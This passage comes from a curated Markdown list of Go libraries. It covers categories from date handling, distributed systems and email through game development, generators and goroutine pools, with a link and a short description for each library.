[goes](https://github.com/OwnLocal/goes) - Library to interact with Elasticsearch.\n- [skizze](https://github.com/seiflotfy/skizze) - probabilistic data-structures service and storage.\n\n**[⬆ back to top](#contents)**\n\n## Date and Time\n\n_Libraries for working with dates and times._\n\n- [carbon](https://github.com/golang-module/carbon) - A simple, semantic and developer-friendly golang package for datetime.\n- [carbon](https://github.com/uniplaces/carbon) - Simple Time extension with a lot of util methods, ported from PHP Carbon library.\n- [cronrange](https://github.com/1set/cronrange) - Parses Cron-style time range expressions, checks if the given time is within any ranges.\n- [date](https://github.com/rickb777/date) - Augments Time for working with dates, date ranges, time spans, periods, and time-of-day.\n- [dateparse](https://github.com/araddon/dateparse) - Parse date's without knowing format in advance.\n- [durafmt](https://github.com/hako/durafmt) - Time duration formatting library for Go.\n- [feiertage](https://github.com/wlbr/feiertage) - Set of functions to calculate public holidays in Germany, incl. specialization on the states of Germany (Bundesländer). Things like Easter, Pentecost, Thanksgiving...\n- [go-anytime](https://github.com/ijt/go-anytime) - Parse dates/times like \"next dec 22nd at 3pm\" and ranges like \"from today until next thursday\" without knowing the format in advance.\n- [go-persian-calendar](https://github.com/yaa110/go-persian-calendar) - The implementation of the Persian (Solar Hijri) Calendar in Go (golang).\n- [go-str2duration](https://github.com/xhit/go-str2duration) - Convert string to duration. Support time.Duration returned string and more.\n- [go-sunrise](https://github.com/nathan-osman/go-sunrise) - Calculate the sunrise and sunset times for a given location.\n- [go-week](https://github.com/stoewer/go-week) - An efficient package to work with ISO8601 week dates.\n- [gostradamus](https://github.com/bykof/gostradamus) - A Go package for working with dates.\n- [iso8601](https://github.com/relvacode/iso8601) - Efficiently parse ISO8601 date-times without regex.\n- [kair](https://github.com/GuilhermeCaruso/kair) - Date and Time - Golang Formatting Library.\n- [now](https://github.com/jinzhu/now) - Now is a time toolkit for golang.\n- [NullTime](https://github.com/kirillDanshin/nulltime) - Nullable `time.Time`.\n- [strftime](https://github.com/awoodbeck/strftime) - C99-compatible strftime formatter.\n- [timespan](https://github.com/SaidinWoT/timespan) - For interacting with intervals of time, defined as a start time and a duration.\n- [timeutil](https://github.com/leekchan/timeutil) - Useful extensions (Timedelta, Strftime, ...) to the golang's time package.\n- [tuesday](https://github.com/osteele/tuesday) - Ruby-compatible Strftime function.\n\n**[⬆ back to top](#contents)**\n\n## Distributed Systems\n\n_Packages that help with building Distributed Systems._\n\n- [arpc](https://github.com/lesismal/arpc) - More effective network communication, support two-way-calling, notify, broadcast.\n- [celeriac](https://github.com/svcavallar/celeriac.v1) - Library for adding support for interacting and monitoring Celery workers, tasks and events in Go.\n- [consistent](https://github.com/buraksezer/consistent) - Consistent hashing with bounded loads.\n- [consistenthash](https://github.com/mbrostami/consistenthash) - Consistent hashing with configurable replicas.\n- [dht](https://github.com/anacrolix/dht) - BitTorrent Kademlia DHT implementation.\n- [digota](https://github.com/digota/digota) - grpc ecommerce microservice.\n- [dot](https://github.com/dotchain/dot/) - distributed sync using operational transformation/OT.\n- [doublejump](https://github.com/edwingeng/doublejump) - A revamped Google's jump consistent hash.\n- [dragonboat](https://github.com/lni/dragonboat) - A feature complete and high performance multi-group Raft library in Go.\n- [Dragonfly](https://github.com/dragonflyoss/Dragonfly2) - Provide efficient, stable and secure file distribution and image acceleration based on p2p technology to be the best practice and standard solution in cloud native architectures.\n- [drmaa](https://github.com/dgruber/drmaa) - Job submission library for cluster schedulers based on the DRMAA standard.\n- [dynamolock](https://cirello.io/dynamolock) - DynamoDB-backed distributed locking implementation.\n- [dynatomic](https://github.com/tylfin/dynatomic) - A library for using DynamoDB as an atomic counter.\n- [emitter-io](https://github.com/emitter-io/emitter) - High performance, distributed, secure and low latency publish-subscribe platform built with MQTT, Websockets and love.\n- [failured](https://github.com/andy2046/failured) - adaptive accrual failure detector for distributed systems.\n- [flowgraph](https://github.com/vectaport/flowgraph) - flow-based programming package.\n- [gleam](https://github.com/chrislusf/gleam) - Fast and scalable distributed map/reduce system written in pure Go and Luajit, combining Go's high concurrency with Luajit's high performance, runs standalone or distributed.\n- [glow](https://github.com/chrislusf/glow) - Easy-to-Use scalable distributed big data processing, Map-Reduce, DAG execution, all in pure Go.\n- [gmsec](https://github.com/gmsec/micro) - A Go distributed systems development framework.\n- [go-doudou](https://github.com/unionj-cloud/go-doudou) - A gossip protocol and OpenAPI 3.0 spec based decentralized microservice framework. Built-in go-doudou cli focusing on low-code and rapid dev can power up your productivity.\n- [go-health](https://github.com/InVisionApp/go-health) - Library for enabling asynchronous dependency health checks in your service.\n- [go-jump](https://github.com/dgryski/go-jump) - Port of Google's \"Jump\" Consistent Hash function.\n- [go-kit](https://github.com/go-kit/kit) - Microservice toolkit with support for service discovery, load balancing, pluggable transports, request tracking, etc.\n- [go-micro](https://github.com/micro/go-micro) - A distributed systems development framework.\n- [go-mysql-lock](https://github.com/sanketplus/go-mysql-lock) - MySQL based distributed lock.\n- [go-pdu](https://github.com/pdupub/go-pdu) - A decentralized identity-based social network.\n- [go-sundheit](https://github.com/AppsFlyer/go-sundheit) - A library built to provide support for defining async service health checks for golang services.\n- [go-zero](https://github.com/tal-tech/go-zero) - A web and rpc framework. It's born to ensure the stability of the busy sites with resilient design. Builtin goctl greatly improves the development productivity.\n- [gorpc](https://github.com/valyala/gorpc) - Simple, fast and scalable RPC library for high load.\n- [grpc-go](https://github.com/grpc/grpc-go) - The Go language implementation of gRPC. HTTP/2 based RPC.\n- [hprose](https://github.com/hprose/hprose-golang) - Very newbility RPC Library, support 25+ languages now.\n- [jsonrpc](https://github.com/osamingo/jsonrpc) - The jsonrpc package helps implement of JSON-RPC 2.0.\n- [jsonrpc](https://github.com/ybbus/jsonrpc) - JSON-RPC 2.0 HTTP client implementation.\n- [Kitex](https://github.com/cloudwego/kitex) - A high-performance and strong-extensibility Golang RPC framework that helps developers build microservices. If the performance and extensibility are the main concerns when you develop microservices, Kitex can be a good choice.\n- [Kratos](https://github.com/go-kratos/kratos) - A modular-designed and easy-to-use microservices framework in Go.\n- [liftbridge](https://github.com/liftbridge-io/liftbridge) - Lightweight, fault-tolerant message streams for NATS.\n- [lura](https://github.com/luraproject/lura) - Ultra performant API Gateway framework with middlewares.\n- [micro](https://github.com/micro/micro) - A distributed systems runtime for the cloud and beyond.\n- [NATS](https://github.com/nats-io/gnatsd) - Lightweight, high performance messaging system for microservices, IoT, and cloud native systems.\n- [outboxer](https://github.com/italolelis/outboxer) - Outboxer is a go library that implements the outbox pattern.\n- [pglock](https://cirello.io/pglock) - PostgreSQL-backed distributed locking implementation.\n- [pjrpc](https://gitlab.com/pjrpc/pjrpc) - Golang JSON-RPC Server-Client with Protobuf spec.\n- [raft](https://github.com/hashicorp/raft) - Golang implementation of the Raft consensus protocol, by HashiCorp.\n- [raft](https://github.com/etcd-io/raft) - Go implementation of the Raft consensus protocol, by CoreOS.\n- [rain](https://github.com/cenkalti/rain) - BitTorrent client and library.\n- [redis-lock](https://github.com/bsm/redislock) - Simplified distributed locking implementation using Redis.\n- [resgate](https://resgate.io/) - Realtime API Gateway for building REST, real time, and RPC APIs, where all clients are synchronized seamlessly.\n- [ringpop-go](https://github.com/uber/ringpop-go) - Scalable, fault-tolerant application-layer sharding for Go applications.\n- [rpcx](https://github.com/smallnest/rpcx) - Distributed pluggable RPC service framework like alibaba Dubbo.\n- [Semaphore](https://github.com/jexia/semaphore) - A straightforward (micro) service orchestrator.\n- [sleuth](https://github.com/ursiform/sleuth) - Library for master-less p2p auto-discovery and RPC between HTTP services (using [ZeroMQ](https://github.com/zeromq/libzmq)).\n- [Temporal](https://github.com/temporalio/sdk-go) - Durable execution system for making code fault-tolerant and simple.\n- [torrent](https://github.com/anacrolix/torrent) - BitTorrent client package.\n\n**[⬆ back to top](#contents)**\n\n## Dynamic DNS\n\n_Tools for updating dynamic DNS records._\n\n- [DDNS](https://github.com/skibish/ddns) - Personal DDNS client with Digital Ocean Networking DNS as backend.\n- [dyndns](https://gitlab.com/alcastle/dyndns) - Background Go process to regularly and automatically check your IP Address and make updates to (one or many) Dynamic DNS records for Google domains whenever your address changes.\n- [GoDNS](https://github.com/timothyye/godns) - A dynamic DNS client tool, supports DNSPod & HE.net, written in Go.\n\n**[⬆ back to top](#contents)**\n\n## Email\n\n_Libraries and tools that implement email creation and sending._\n\n- [chasquid](https://blitiri.com.ar/p/chasquid) - SMTP server written in Go.\n- [douceur](https://github.com/aymerick/douceur) - CSS inliner for your HTML emails.\n- [email](https://github.com/jordan-wright/email) - A robust and flexible email library for Go.\n- [email-verifier](https://github.com/AfterShip/email-verifier) - A Go library for email verification without sending any emails.\n- [go-dkim](https://github.com/toorop/go-dkim) - DKIM library, to sign & verify email.\n- [go-email-normalizer](https://github.com/dimuska139/go-email-normalizer) - Golang library for providing a canonical representation of email address.\n- [go-email-validator](https://github.com/go-email-validator/go-email-validator) - Modular email validator for syntax, disposable, smtp, etc... checking.\n- [go-imap](https://github.com/emersion/go-imap) - IMAP library for clients and servers.\n- [go-mail](https://github.com/wneessen/go-mail) - A simple Go library for sending mails in Go.\n- [go-message](https://github.com/emersion/go-message) - Streaming library for the Internet Message Format and mail messages.\n- [go-premailer](https://github.com/vanng822/go-premailer) - Inline styling for HTML mail in Go.\n- [go-simple-mail](https://github.com/xhit/go-simple-mail) - Very simple package to send emails with SMTP Keep Alive and two timeouts: Connect and Send.\n- [Hectane](https://github.com/hectane/hectane) - Lightweight SMTP client providing an HTTP API.\n- [hermes](https://github.com/matcornic/hermes) - Golang package that generates clean, responsive HTML e-mails.\n- [mailchain](https://github.com/mailchain/mailchain) - Send encrypted emails to blockchain addresses written in Go.\n- [mailgun-go](https://github.com/mailgun/mailgun-go) - Go library for sending mail with the Mailgun API.\n- [MailHog](https://github.com/mailhog/MailHog) - Email and SMTP testing with web and API interface.\n- [Mailpit](https://github.com/axllent/mailpit) - Email and SMTP testing tool for developers.\n- [mailx](https://github.com/valord577/mailx) - Mailx is a library that makes it easier to send email via SMTP. It is an enhancement of the golang standard library `net/smtp`.\n- [SendGrid](https://github.com/sendgrid/sendgrid-go) - SendGrid's Go library for sending email.\n- [smtp](https://github.com/mailhog/smtp) - SMTP server protocol state machine.\n- [smtpmock](https://github.com/mocktools/go-smtp-mock) - Lightweight configurable multithreaded fake SMTP server. Mimic any SMTP behaviour for your test environment.\n- [truemail-go](https://github.com/truemail-rb/truemail-go) - Configurable Golang email validator/verifier. Verify email via Regex, DNS, SMTP and even more.\n\n**[⬆ back to top](#contents)**\n\n## Embeddable Scripting Languages\n\n_Embedding other languages inside your go code._\n\n- [anko](https://github.com/mattn/anko) - Scriptable interpreter written in Go.\n- [binder](https://github.com/alexeyco/binder) - Go to Lua binding library, based on [gopher-lua](https://github.com/yuin/gopher-lua).\n- [cel-go](https://github.com/google/cel-go) - Fast, portable, non-Turing complete expression evaluation with gradual typing.\n- [ecal](https://github.com/krotik/ecal) - A simple embeddable scripting language which supports concurrent event processing.\n- [expr](https://github.com/antonmedv/expr) - Expression evaluation engine for Go: fast, non-Turing complete, dynamic typing, static typing.\n- [gentee](https://github.com/gentee/gentee) - Embeddable scripting programming language.\n- [gisp](https://github.com/jcla1/gisp) - Simple LISP in Go.\n- [go-duktape](https://github.com/olebedev/go-duktape) - Duktape JavaScript engine bindings for Go.\n- [go-lua](https://github.com/Shopify/go-lua) - Port of the Lua 5.2 VM to pure Go.\n- [go-php](https://github.com/deuill/go-php) - PHP bindings for Go.\n- [go-python](https://github.com/sbinet/go-python) - naive go bindings to the CPython C-API.\n- [goja](https://github.com/dop251/goja) - ECMAScript 5.1(+) implementation in Go.\n- [golua](https://github.com/aarzilli/golua) - Go bindings for Lua C API.\n- [gopher-lua](https://github.com/yuin/gopher-lua) - Lua 5.1 VM and compiler written in Go.\n- [gval](https://github.com/PaesslerAG/gval) - A highly customizable expression language written in Go.\n- [metacall](https://github.com/metacall/core) - Cross-platform Polyglot Runtime which supports NodeJS, JavaScript, TypeScript, Python, Ruby, C#, WebAssembly, Java, Cobol and more.\n- [ngaro](https://github.com/db47h/ngaro) - Embeddable Ngaro VM implementation enabling scripting in Retro.\n- [prolog](https://github.com/ichiban/prolog) - Embeddable Prolog.\n- [purl](https://github.com/ian-kent/purl) - Perl 5.18.2 embedded in Go.\n- [starlark-go](https://github.com/google/starlark-go) - Go implementation of Starlark: Python-like language with deterministic evaluation and hermetic execution.\n- [tengo](https://github.com/d5/tengo) - Bytecode compiled script language for Go.\n\n**[⬆ back to top](#contents)**\n\n## Error Handling\n\n_Libraries for handling errors._\n\n- [emperror](https://github.com/emperror/emperror) - Error handling tools and best practices for Go libraries and applications.\n- [eris](https://github.com/rotisserie/eris) - A better way to handle, trace, and log errors in Go. Compatible with the standard error library and github.com/pkg/errors.\n- [errlog](https://github.com/snwfdhmp/errlog) - Hackable package that determines responsible source code for an error (and some other fast-debugging features). Pluggable to any logger in-place.\n- [errors](https://github.com/emperror/errors) - Drop-in replacement for the standard library errors package and github.com/pkg/errors. Provides various error handling primitives.\n- [errors](https://github.com/pkg/errors) - Package that provides simple error handling primitives.\n- [errors](https://github.com/neuronlabs/errors) - Simple golang error handling with classification primitives.\n- [errors](https://github.com/PumpkinSeed/errors) - The most simple error wrapper with awesome performance and minimal memory overhead.\n- [errors](https://github.com/bnkamalesh/errors) - Drop-in replacement for builtin Go errors. This is a minimal error handling package with custom error types, user friendly messages, Unwrap & Is. With very easy to use and straightforward helper functions.\n- [errors](https://github.com/cockroachdb/errors) - Go error library with error portability over the network.\n- [errorx](https://github.com/joomcode/errorx) - A feature rich error package with stack traces, composition of errors and more.\n- [exception](https://github.com/rbrahul/exception) - A simple utility package for exception handling with try-catch in Golang.\n- [Falcon](https://github.com/SonicRoshan/falcon) - A Simple Yet Highly Powerful Package For Error Handling.\n- [Fault](https://github.com/Southclaws/fault) - An ergonomic mechanism for wrapping errors in order to facilitate structured metadata and context for error values.\n- [go-multierror](https://github.com/hashicorp/go-multierror) - Go (golang) package for representing a list of errors as a single error.\n- [oops](https://github.com/samber/oops) - Error handling with context, stack trace and source fragments.\n- [tracerr](https://github.com/ztrue/tracerr) - Golang errors with stack trace and source fragments.\n\n**[⬆ back to top](#contents)**\n\n## File Handling\n\n_Libraries for handling files and file systems._\n\n- [afero](https://github.com/spf13/afero) - FileSystem Abstraction System for Go.\n- [afs](https://github.com/viant/afs) - Abstract File Storage (mem, scp, zip, tar, cloud: s3, gs) for Go.\n- [baraka](https://github.com/xis/baraka) - A library to process http file uploads easily.\n- [bigfile](https://github.com/bigfile/bigfile) - A file transfer system, support to manage files with http api, rpc call and ftp client.\n- [checksum](https://github.com/codingsince1985/checksum) - Compute message digest, like MD5, SHA256, SHA1, CRC or BLAKE2s, for large files.\n- [copy](https://github.com/otiai10/copy) - Copy directory recursively.\n- [flop](https://github.com/homedepot/flop) - File operations library which aims to mirror feature parity with [GNU cp](https://www.gnu.org/software/coreutils/manual/html_node/cp-invocation.html).\n- [gdu](https://github.com/dundee/gdu) - Disk usage analyzer with console interface.\n- [go-csv-tag](https://github.com/artonge/go-csv-tag) - Load csv file using tag.\n- [go-decent-copy](https://github.com/hugocarreira/go-decent-copy) - Copy files for humans.\n- [go-exiftool](https://github.com/barasher/go-exiftool) - Go bindings for ExifTool, the well-known library used to extract as much metadata as possible (EXIF, IPTC, ...) from files (pictures, PDF, office, ...).\n- [go-gtfs](https://github.com/artonge/go-gtfs) - Load gtfs files in go.\n- [gofs](https://github.com/no-src/gofs) - A cross-platform real-time file synchronization tool out of the box.\n- [gut/yos](https://github.com/1set/gut) - Simple and reliable package for file operations like copy/move/diff/list on files, directories and symbolic links.\n- [higgs](https://github.com/dastoori/higgs) - A tiny cross-platform Go library to hide/unhide files and directories.\n- [notify](https://github.com/rjeczalik/notify) - File system event notification library with simple API, similar to os/signal.\n- [opc](https://github.com/qmuntal/opc) - Load Open Packaging Conventions (OPC) files for Go.\n- [parquet](https://github.com/parsyl/parquet) - Read and write [parquet](https://parquet.apache.org) files.\n- [pathtype](https://github.com/jonchun/pathtype) - Treat paths as their own type instead of using strings.\n- [pdfcpu](https://github.com/pdfcpu/pdfcpu) - PDF processor.\n- [skywalker](https://github.com/dixonwille/skywalker) - Package to allow one to concurrently go through a filesystem with ease.\n- [stl](https://gitlab.com/russoj88/stl) - Modules to read and write STL (stereolithography) files. Concurrent algorithm for reading.\n- [tarfs](https://github.com/posener/tarfs) - Implementation of the [`FileSystem` interface](https://godoc.org/github.com/kr/fs#FileSystem) for tar files.\n- [todotxt](https://github.com/1set/todotxt) - Go library for Gina Trapani's [_todo.txt_](http://todotxt.org/) files, supports parsing and manipulating of task lists in the [_todo.txt_ format](https://github.com/todotxt/todo.txt).\n- [vfs](https://github.com/C2FO/vfs) - A pluggable, extensible, and opinionated set of filesystem functionality for Go across a number of filesystem types such as os, S3, and GCS.\n\n**[⬆ back to top](#contents)**\n\n## Financial\n\n_Packages for accounting and finance._\n\n- [accounting](https://github.com/leekchan/accounting) - money and currency formatting for golang.\n- [ach](https://github.com/moov-io/ach) - A reader, writer, and validator for Automated Clearing House (ACH) files.\n- [bbgo](https://github.com/c9s/bbgo) - A crypto trading bot framework written in Go. Including common crypto exchange API, standard indicators, back-testing and many built-in strategies.\n- [currency](https://github.com/bojanz/currency) - Handles currency amounts, provides currency information and formatting.\n- [currency](https://github.com/bnkamalesh/currency) - High performant & accurate currency computation package.\n- [decimal](https://github.com/shopspring/decimal) - Arbitrary-precision fixed-point decimal numbers.\n- [fpdecimal](https://github.com/nikolaydubina/fpdecimal) - Fast and precise serialization and arithmetic for small fixed-point decimals\n- [fpmoney](https://github.com/nikolaydubina/fpmoney) - Fast and simple ISO4217 fixed-point decimal money.\n- [go-finance](https://github.com/alpeb/go-finance) - Library of financial functions for time value of money (annuities), cash flow, interest rate conversions, bonds and depreciation calculations.\n- [go-finance](https://github.com/pieterclaerhout/go-finance) - Module to fetch exchange rates, check VAT numbers via VIES and check IBAN bank account numbers.\n- [go-finnhub](https://github.com/m1/go-finnhub) - Client for stock market, forex and crypto data from finnhub.io. Access real-time financial market data from 60+ stock exchanges, 10 forex brokers, and 15+ crypto exchanges.\n- [go-money](https://github.com/rhymond/go-money) - Implementation of Fowler's Money pattern.\n- [ofxgo](https://github.com/aclindsa/ofxgo) - Query OFX servers and/or parse the responses (with example command-line client).\n- [orderbook](https://github.com/i25959341/orderbook) - Matching Engine for Limit Order Book in Golang.\n- [payme](https://github.com/jovandeginste/payme) - QR code generator (ASCII & PNG) for SEPA payments.\n- [sleet](https://github.com/BoltApp/sleet) - One unified interface for multiple Payment Service Providers (PsP) to process online payment.\n- [techan](https://github.com/sdcoffey/techan) - Technical analysis library with advanced market analysis and trading strategies.\n- [ticker](https://github.com/achannarasappa/ticker) - Terminal stock watcher and stock position tracker.\n- [transaction](https://github.com/claygod/transaction) - Embedded transactional database of accounts, running in multithreaded mode.\n- [vat](https://github.com/dannyvankooten/vat) - VAT number validation & EU VAT rates.\n\n**[⬆ back to top](#contents)**\n\n## Forms\n\n_Libraries for working with forms._\n\n- [bind](https://github.com/robfig/bind) - Bind form data to any Go values.\n- [binding](https://github.com/mholt/binding) - Binds form and JSON data from net/http Request to struct.\n- [conform](https://github.com/leebenson/conform) - Keeps user input in check. Trims, sanitizes & scrubs data based on struct tags.\n- [form](https://github.com/go-playground/form) - Decodes url.Values into Go value(s) and Encodes Go value(s) into url.Values. Dual Array and Full map support.\n- [formam](https://github.com/monoculum/formam) - decode form's values into a struct.\n- [forms](https://github.com/albrow/forms) - Framework-agnostic library for parsing and validating form/JSON data which supports multipart forms and files.\n- [gbind](https://github.com/bdjimmy/gbind) - Bind data to any Go value. Can use built-in and custom expression binding capabilities; supports data validation\n- [gorilla/csrf](https://github.com/gorilla/csrf) - CSRF protection for Go web applications & services.\n- [httpin](https://github.com/ggicci/httpin) - Decode an HTTP request into a custom struct, including querystring, forms, HTTP headers, etc.\n- [nosurf](https://github.com/justinas/nosurf) - CSRF protection middleware for Go.\n- [qs](https://github.com/sonh/qs) - Go module for encoding structs into URL query parameters.\n- [queryparam](https://github.com/tomwright/queryparam) - Decode `url.Values` into usable struct values of standard or custom types.\n\n**[⬆ back to top](#contents)**\n\n## Functional\n\n_Packages to support functional programming in Go._\n\n- [fp-go](https://github.com/repeale/fp-go) - Collection of Functional Programming helpers powered by Golang 1.18+ generics.\n- [fpGo](https://github.com/TeaEntityLab/fpGo) - Monad, Functional Programming features for Golang.\n- [fuego](https://github.com/seborama/fuego) - Functional Experiment in Go.\n- [go-functional](https://github.com/BooleanCat/go-functional) - Functional programming in Go using generics\n- [go-underscore](https://github.com/tobyhede/go-underscore) - Useful collection of helpfully functional Go collection utilities.\n- [gofp](https://github.com/rbrahul/gofp) - A lodash like powerful utility library for Golang.\n- [mo](https://github.com/samber/mo) - Monads and popular FP abstractions, based on Go 1.18+ Generics (Option, Result, Either...).\n- [underscore](https://github.com/rjNemo/underscore) - Functional programming helpers for Go 1.18 and beyond.\n- [valor](https://github.com/phelmkamp/valor) - Generic option and result types that optionally contain a value.\n\n**[⬆ back to top](#contents)**\n\n## Game Development\n\n_Awesome game development libraries._\n\n- [Azul3D](https://github.com/azul3d/engine) - 3D game engine written in Go.\n- [Ebitengine](https://github.com/hajimehoshi/ebiten) - dead simple 2D game engine in Go.\n- [engo](https://github.com/EngoEngine/engo) - Engo is an open-source 2D game engine written in Go. It follows the Entity-Component-System paradigm.\n- [fantasyname](https://github.com/s0rg/fantasyname) - Fantasy names generator.\n- [g3n](https://github.com/g3n/engine) - Go 3D Game Engine.\n- [go-astar](https://github.com/beefsack/go-astar) - Go implementation of the A\\* path finding algorithm.\n- [go-sdl2](https://github.com/veandco/go-sdl2) - Go bindings for the [Simple DirectMedia Layer](https://www.libsdl.org/).\n- [go3d](https://github.com/ungerik/go3d) - Performance oriented 2D/3D math package for Go.\n- [gonet](https://github.com/xtaci/gonet) - Game server skeleton implemented with golang.\n- [goworld](https://github.com/xiaonanln/goworld) - Scalable game server engine, featuring space-entity framework and hot-swapping.\n- [Harfang3D](https://github.com/harfang3d/harfang3d) - 3D engine for the Go language, works on Windows and Linux ([Harfang on Go.dev](https://github.com/harfang3d/harfang-go)).\n- [Leaf](https://github.com/name5566/leaf) - Lightweight game server framework.\n- [nano](https://github.com/lonng/nano) - Lightweight, facility, high performance golang based game server framework.\n- [Oak](https://github.com/oakmound/oak) - Pure Go game engine.\n- [Pitaya](https://github.com/topfreegames/pitaya) - Scalable game server framework with clustering support and client libraries for iOS, Android, Unity and others through the C SDK.\n- [Pixel](https://github.com/faiface/pixel) - Hand-crafted 2D game library in Go.\n- [prototype](https://github.com/gonutz/prototype) - Cross-platform (Windows/Linux/Mac) library for creating desktop games using a minimal API.\n- [raylib-go](https://github.com/gen2brain/raylib-go) - Go bindings for [raylib](https://www.raylib.com/), a simple and easy-to-use library to learn videogames programming.\n- [termloop](https://github.com/JoelOtter/termloop) - Terminal-based game engine for Go, built on top of Termbox.\n- [tile](https://github.com/kelindar/tile) - Data-oriented and cache-friendly 2D Grid library (TileMap), includes pathfinding, observers and import/export.\n\n**[⬆ back to top](#contents)**\n\n## Generators\n\n_Tools that generate Go code._\n\n- [convergen](https://github.com/reedom/convergen) - Feature rich type-to-type copy code generator.\n- [copygen](https://github.com/switchupcb/copygen) - Generate type-to-type and type-based code without reflection.\n- [generis](https://github.com/senselogic/GENERIS) - Code generation tool providing generics, free-form macros, conditional compilation and HTML templating.\n- [go-enum](https://github.com/abice/go-enum) - Code generation for enums from code comments.\n- [go-linq](https://github.com/ahmetalpbalkan/go-linq) - .NET LINQ-like query methods for Go.\n- [goderive](https://github.com/awalterschulze/goderive) - Derives functions from input types.\n- [gotype](https://github.com/wzshiming/gotype) - Golang source code parsing, usage like reflect package.\n- [goverter](https://github.com/jmattheis/goverter) - Generate converters by defining an interface.\n- [GoWrap](https://github.com/hexdigest/gowrap) - Generate decorators for Go interfaces using simple templates.\n- [interfaces](https://github.com/rjeczalik/interfaces) - Command line tool for generating interface definitions.\n- [jennifer](https://github.com/dave/jennifer) - Generate arbitrary Go code without templates.\n- [typeregistry](https://github.com/xiaoxin01/typeregistry) - A library to create type dynamically.\n\n**[⬆ back to top](#contents)**\n\n## Geographic\n\n_Geographic tools and servers_\n\n- [geoserver](https://github.com/hishamkaram/geoserver) - geoserver Is a Go Package For Manipulating a GeoServer Instance via the GeoServer REST API.\n- [gismanager](https://github.com/hishamkaram/gismanager) - Publish Your GIS Data(Vector Data) to PostGIS and Geoserver.\n- [godal](https://github.com/airbusgeo/godal) - Go wrapper for GDAL.\n- [H3](https://github.com/uber/h3-go) - Go bindings for H3, a hierarchical hexagonal geospatial indexing system.\n- [H3 GeoJSON](https://github.com/mmadfox/go-geojson2h3) - Conversion utilities between H3 indexes and GeoJSON.\n- [H3GeoDist](https://github.com/mmadfox/go-h3geo-dist) - Distribution of Uber H3geo cells by virtual nodes.\n- [mbtileserver](https://github.com/consbio/mbtileserver) - A simple Go-based server for map tiles stored in mbtiles format.\n- [osm](https://github.com/paulmach/osm) - Library for reading, writing and working with OpenStreetMap data and APIs.\n- [pbf](https://github.com/maguro/pbf) - OpenStreetMap PBF golang encoder/decoder.\n- [S2 geojson](https://github.com/pantrif/s2-geojson) - Convert geojson to s2 cells & demonstrating some S2 geometry features on map.\n- [S2 geometry](https://github.com/golang/geo) - S2 geometry library in Go.\n- [simplefeatures](https://github.com/peterstace/simplefeatures) - simplesfeatures is a 2D geometry library that provides Go types that model geometries, as well as algorithms that operate on them.\n- [Tile38](https://github.com/tidwall/tile38) - Geolocation DB with spatial index and realtime geofencing.\n- [Web-Mercator-Projection](https://github.com/jorelosorio/web-mercator-projection) A project to easily use and convert LonLat, Point and Tile to display info, markers, etc, in a map using the Web Mercator Projection.\n- [WGS84](https://github.com/wroge/wgs84) - Library for Coordinate Conversion and Transformation (ETRS89, OSGB36, NAD83, RGF93, Web Mercator, UTM).\n\n**[⬆ back to top](#contents)**\n\n## Go Compilers\n\n_Tools for compiling Go to other languages._\n\n- [c2go](https://github.com/goplus/c2go) - Convert C code to Go code.\n- [c4go](https://github.com/Konstantin8105/c4go) - Transpile C code to Go code.\n- [esp32](https://github.com/andygeiss/esp32-transpiler) - Transpile Go into Arduino code.\n- [f4go](https://github.com/Konstantin8105/f4go) - Transpile FORTRAN 77 code to Go code.\n- [gopherjs](https://github.com/gopherjs/gopherjs) - Compiler from Go to JavaScript.\n- [tardisgo](https://github.com/tardisgo/tardisgo) - Golang to Haxe to CPP/CSharp/Java/JavaScript transpiler.\n\n**[⬆ back to top](#contents)**\n\n## Goroutines\n\n_Tools for managing and working with Goroutines._\n\n- [ants](https://github.com/panjf2000/ants) - A high-performance and low-cost goroutine pool in Go.\n- [artifex](https://github.com/borderstech/artifex) - Simple in-memory job queue for Golang using worker-based dispatching.\n- [async](https://github.com/reugn/async) - An alternative sync library for Go (Future, Promise, Locks).\n- [async](https://github.com/studiosol/async) - A safe way to execute functions asynchronously, recovering them in case of panic.\n- [async-job](https://github.com/lab210-dev/async-job) - AsyncJob is an asynchronous queue job manager with light code, clear and speed.\n- [breaker](https://github.com/kamilsk/breaker) - Flexible mechanism to make execution flow interruptible.\n- [channelify](https://github.com/ddelizia/channelify) - Transform your function to return channels for easy and powerful parallel processing.\n- [conc](https://github.com/sourcegraph/conc) - `conc` is your toolbelt for structured concurrency in go, making common tasks easier and safer.\n- [concurrency-limiter](https://github.com/vivek-ng/concurrency-limiter) - Concurrency limiter with support for timeouts , dynamic priority and context cancellation of goroutines.\n- [conexec](https://github.com/ITcathyh/conexec) - A concurrent toolkit to help execute funcs concurrently in an efficient and safe way. It supports specifying the overall timeout to avoid blocking and uses goroutine pool to improve efficiency.\n- [cyclicbarrier](https://github.com/marusama/cyclicbarrier) - CyclicBarrier for golang.\n- [execpool](https://github.com/hexdigest/execpool) - A pool built around exec.Cmd that spins up a given number of processes in advance and attaches stdin and stdout to them when needed. Very similar to FastCGI or Apache Prefork MPM but works for any command.\n- [flowmatic](https://github.com/carlmjohnson/flowmatic) - Structured concurrency made easy.\n- [go-actor](https://github.com/vladopajic/go-actor) - A tiny library for writing concurrent programs using actor model.\n- [go-floc](https://github.com/workanator/go-floc) - Orchestrate goroutines with ease.\n- [go-flow](https://github.com/kamildrazkiewicz/go-flow) - Control goroutines execution order.\n- [go-tools/multithreading](https://github.com/nikhilsaraf/go-tools) - Manage a pool of goroutines using this lightweight library with a simple API.\n- [go-trylock](https://github.com/subchen/go-trylock) - TryLock support on read-write lock for Golang.\n- [go-waitgroup](https://github.com/pieterclaerhout/go-waitgroup) - Like `sync.WaitGroup` with error handling and concurrency control.\n- [go-workerpool](https://github.com/zenthangplus/go-workerpool) - Inspired from Java Thread Pool, Go WorkerPool aims to control heavy Go Routines.\n- [go-workers](https://github.com/catmullet/go-workers) - Easily and safely run workers for large data processing pipelines.\n- [goccm](https://github.com/zenthangplus/goccm) - Go Concurrency Manager package limits the number of goroutines that allowed to run concurrently.\n- [gohive](https://github.com/loveleshsharma/gohive) - A highly performant and easy to use Goroutine pool for Go.\n- [gollback](https://github.com/vardius/gollback) - asynchronous simple function utilities, for managing execution of closures and callbacks.\n- [gowl](https://github.com/hamed-yousefi/gowl) - Gowl is a process management and process monitoring tool at once. An infinite worker pool gives you the ability to control the pool and processes and monitor their status.\n- [goworker](https://github.com/benmanns/goworker) - goworker is a Go-based background worker.\n- [gowp](https://github.com/xxjwxc/gowp) - gowp is concurrency limiting goroutine pool.\n- [gpool](https://github.com/Sherifabdlnaby/gpool) - manages a resizeable pool of context-aware goroutines to bound concurrency.\n- [grpool](https://github.com/ivpusic/grpool) - Lightweight Goroutine pool.\n- [hands](https://github.com/duanckham/hands) - A process controller used to control the execution and return strategies of 